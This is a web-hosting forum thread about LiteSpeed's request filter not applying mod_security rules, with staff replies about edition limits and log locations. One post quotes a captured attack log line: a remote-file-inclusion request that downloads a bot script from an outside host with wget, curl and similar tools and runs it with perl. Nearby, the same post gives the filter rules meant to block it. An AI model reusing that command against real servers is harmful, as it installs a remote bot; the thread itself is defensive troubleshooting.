secfilter not working

[felosi]

I noticed the last few days I havent been getting any configserver firewall mod security bans in my mail for my server. So I figured it didnt write to /etc/httpd/logs/audit_log like mod security did.
So I went and done some testing with some common exploits I have rules for and didnt get any 403s,
I double checked, made sure the request filter was on. Instead of including the mod security rules with an Include in httpd.conf I copied and pasted my blacklist.conf into a new ruleset in the litespeed admin panel., you can see a copy here www.nix101.com/blacklist.conf. It didnt accept the location match directives so I took them out.

Went back to testing again, nothing. For example you should get a 403 for awstats probe for the request http://secureservertech.com/cgi-bin/awstats/awstats.pl
But if you click the link you notice you only get a 404.

Anyway the most important rules I need are the ones for php shells and stuff like that so i definitely need to get this working. Ive looked over any piossibilty of any mistake I could have made and couldnt find anything.

Any ideas?

 

[mistwang]

LiteSpeed does not write to audit_log.
And if the file does not exist, you will only get 404, as the security check is after that, there is no reason to waste CPU cycles on a request does not possibly become a security threaten.
You should get security log from lsws/logs/error.log, everything goes there.

 

[dbMG]

We got the same problem. After successfully using mod_security rule with Apache in LSWS we don't get this work correct.

Just for 1 day one user get hacked by nasty rule one:

[03/Jul/2007:15:35:44 +0200] "GET /index.php?page=http://myfox.altervista.org/tool25.dat?&cmd=cd%20/tmp;rm%20Bot
D.txt;wget%20http://ekipefireforce.iespana.es/BotD.txt;fetch%20http://ekipefireforce.iespana.es/BotD.txt;lwp-download%20http://ekipe
fireforce.iespana.es/BotD.txt;curl%20-O%20http://ekipefireforce.iespana.es/BotD.txt;lynx%20http://ekipefireforce.iespana.es/BotD.txt
;perl%20BotD.txt HTTP/1.1" 200 16541 "-" "Mozilla/3.0 (compatible; Indy Library)"

This attack was by Indy Library which is stated in rule

SecFilterSelective HTTP_USER_AGENT "Indy Library"

and this

SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"

I'm 100% positive this will not happen in Apache + mod_security. We don't get any errors about wrong rules in /opt/lsws/log/error.log

I was already tried making new Request filter, enable it and still nothing.

I'm a little confused about saying "is equivalent t Apache's mod_security". Cn someone explain how to user REQUEST FILTER correct ?

Regards.

 

[mistwang]

Only Enterprise edition can load security rules from httpd.conf

 

[dbMG]

So, every rule that is in "request filter" will not work until Ent. edition is bought?

Regards.

dbMG

 

[mistwang]

With standard, it works for vhosts configured within our web console, but not for vhosts configured through httpd.conf.
Rules configured from web console has no effect on Apache vhost even with Enterprise, the filter rules need to be configured through httpd.conf for Apache vhosts.

 

[dbMG]

Any date when monthly license can be purchased ?

Thank you.

dbMG

 

[mistwang]

In a week or two.

 

[felosi]

well, I was kinda confused first about it not firing on 404s but it doesnt and does fire on what its supposed to. Would be nice for such an option so its possible to ban people with acunetix scanners and other crap that just guesses over and over despite the cms.
Would also be nice too if it would write to a seperate log and have an option to actually have it write to /etc/httpd/logs/audit_log that way scripts like configserver will be able to ban on ips firing mod security too many times.

 

[pitabread55]

Only Enterprise edition can load security rules from httpd.conf

Wow! That is kind of a biggie. It would be nice if this was noted on the "comparison" page. We were thinking of using the free version for some lower volume boxes just for the DOS protection, but not without the mod_security rules. Time to had back to the drawing board.

Sam

 

[vivek]

Sorry to tell this, but I am having the same issue with litespeed ent version.
I have had mod_security + apache + CSF and that was great.
I got several mails when modsec bloks a request.
But when I changed to litespeed ent version, the modsec is not working.

Sorry to say, litespeed enterprise cant import modsec rules from httpd.conf and if it can import then it cant filter the request.

Need to develop more for accepting modsec rules.

PS: I have modsec 1.9 ruleset.

 

[aww]

I'd love to be able to use mod_security rules too with LiteSpeed?

Is it possible to import these kinds of rulesets?
http://www.gotroot.com/tiki-index.php?page=mod_security+rules

 

[felosi]

I'd love to be able to use mod_security rules too with LiteSpeed?

Is it possible to import these kinds of rulesets?
http://www.gotroot.com/tiki-index.php?page=mod_security+rules

Of course. I think it has problems with some of them.

But those gotroot rules are very outdated and include LOTS and LOTS and TONS of garbage you will never ever in a million years need. Like filters for apps that are not even made anymore, stuff like that

I have a trimmed down version here
www.nix101.com/mod_security.conf

Now, f you plan on ever starting apache you will need to have modsec 1.95 compiled or just comment out the include line

All you do is "Include /whereveruputit/mod_security.conf"
in httpd.conf

I did try the apache style configurations in lsws admin and did not work. i dont know if its supposed to for that or not

 

[mistwang]

Everything should go through the Apache httpd.conf for vhosts configured through httpd.conf. It works fine.